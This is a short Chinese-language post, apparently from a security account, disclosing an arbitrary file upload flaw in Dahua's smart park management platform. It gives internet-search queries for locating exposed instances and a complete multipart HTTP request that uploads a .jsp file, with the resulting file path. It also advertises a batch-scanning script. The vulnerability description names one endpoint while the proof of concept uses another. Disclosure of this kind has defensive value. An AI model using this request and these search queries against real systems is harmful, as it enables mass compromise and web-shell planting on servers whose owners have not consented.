大华智慧园区综合管理平台任意文件上传[附POC]

# 拒绝知识星球付费POC

免责声明:

本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。

漏洞描述

漏洞描述 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在在野 0day 漏洞,攻击者可以通过请求/emap/devicePoint_addImgIco接口任意上传文件,导致系统被攻击与控制。

关键字

fofa语句:app=”dahua-智慧园区综合管理平台”

鹰图语句:web.body=”/WPMS/asset/lib/gridster/“

漏洞复现

POST /publishing/publishing/material/file/video HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 245Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close
--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"
submit--dd8f988919484abab3816881c55272a7--

大华智慧园区综合管理平台任意文件上传[附POC]_第1张图片

/publishingImg/VIDEO/231113221005122552.jsp

大华智慧园区综合管理平台任意文件上传[附POC]_第2张图片

检测poc

单个检测:

图片

批量检测:

大华智慧园区综合管理平台任意文件上传[附POC]_第3张图片

脚本获取方式:

关注本公众号“知攻善防实验室”,回复“1008”

你可能感兴趣的:(安全,网络)